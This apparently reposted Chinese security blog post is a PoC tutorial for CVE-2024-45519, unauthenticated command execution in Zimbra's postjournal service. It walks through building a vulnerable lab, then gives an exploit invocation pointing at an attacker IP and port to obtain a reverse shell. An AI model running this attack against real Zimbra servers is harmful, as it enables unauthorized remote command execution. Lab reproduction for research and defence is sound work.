【PoC】CVE-2024-45519 - Zimbra Postjournal 漏洞利用教程

admin 2024年10月6日23:10:54评论127 views字数 1556阅读5分11秒阅读模式
【PoC】CVE-2024-45519 - Zimbra Postjournal 漏洞利用教程

描述 ⚠️

CVE-2024-45519 是 Zimbra Collaboration (ZCS) 中的一个漏洞,允许未认证的用户通过 postjournal 服务执行命令。本指南将引导您设置实验室环境以重现此问题并执行漏洞利用。

受影响的版本 🐛

  • Joule: 版本 8.8.15
  • Kepler: 版本 9.0.0
  • Daffodil: 版本 10.0.x 在 10.0.9 之前的版本
  • Daffodil: 版本 10.1.0

实验室设置 🖥️

  1. 准备测试环境
    确保您的实验室机器上运行的是 Ubuntu 20.04.6 LTS (Focal Fossa)。
    示例测试环境:Ubuntu 20.04.6 LTS。

  2. 下载 Zimbra
    运行以下命令下载并解压 Zimbra Collaboration 包:

    sudo su
    wget https://files.zimbra.com/downloads/8.8.15_GA/zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz
    tar -xvzf zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz
    cd zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220
  3. 配置主机名
    将主机名设置为 zimbra.labo

    hostnamectl set-hostname zimbra.labo
  4. 安装 Zimbra
    请按照此处的安装指南操作 👉 Zimbra 安装指南。
    当提示使用 Zimbra 的包存储库时,请选择 No

  5. 替换易受攻击的 postjournal 二进制文件
    结束掉正在运行的 postjournal 进程并用易受攻击的二进制文件替换它:

    sudo pkill postjournal
    dpkg-deb -x packages/zimbra-core_8.8.15.GA.4177.UBUNTU20.64_amd64.deb /tmp/zimbra-core
    sudo cp /tmp/zimbra-core/opt/zimbra/libexec/postjournal /opt/zimbra/libexec/postjournal
  6. 启用并重启 Zimbra 服务
    zimbra 用户身份登录并启用 postjournal 服务:

    sudo su - zimbra
    zmlocalconfig -e postjournal_enabled=true
    zmcontrol restart

漏洞利用使用方法 🚀

一旦实验室设置并运行完毕,您可以使用漏洞利用来利用该漏洞。

步骤:

  1. 准备漏洞利用脚本
    确保漏洞利用脚本(假设您已经准备好了)针对正确的 IP 地址和端口。

  2. 运行漏洞利用脚本
    执行漏洞利用脚本来针对易受攻击的 Zimbra 实例。例如,使用您的脚本:

    python exploit.py <target> -lh <attacker-ip> -lp <attacker-port> -p <smtp-port>
  3. 享受您的 shell
    一旦漏洞利用成功连接,您将在 Zimbra 服务器上获得命令执行权限!🎉

参考资料 🔗

  • Zimbra CVE-2024-45519 - Cyberveille eSante
  • Zimbra 远程代码执行博客 - ProjectDiscovery

免责声明 ⚠️

此漏洞利用和指南仅用于教育目的。请负责任地使用此信息,仅在您有明确权限测试的系统上使用。未经授权的系统利用是非法且不道德的。作者,贡献者和本公众号不对因使用此信息而造成的任何误用或损害负责。

https://github.com/Chocapikk/CVE-2024-45519

原文始发于微信公众号(独眼情报):【PoC】CVE-2024-45519 - Zimbra Postjournal 漏洞利用教程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月6日23:10:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【PoC】CVE-2024-45519 - Zimbra Postjournal 漏洞利用教程http://cn-sec.com/archives/3235330.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息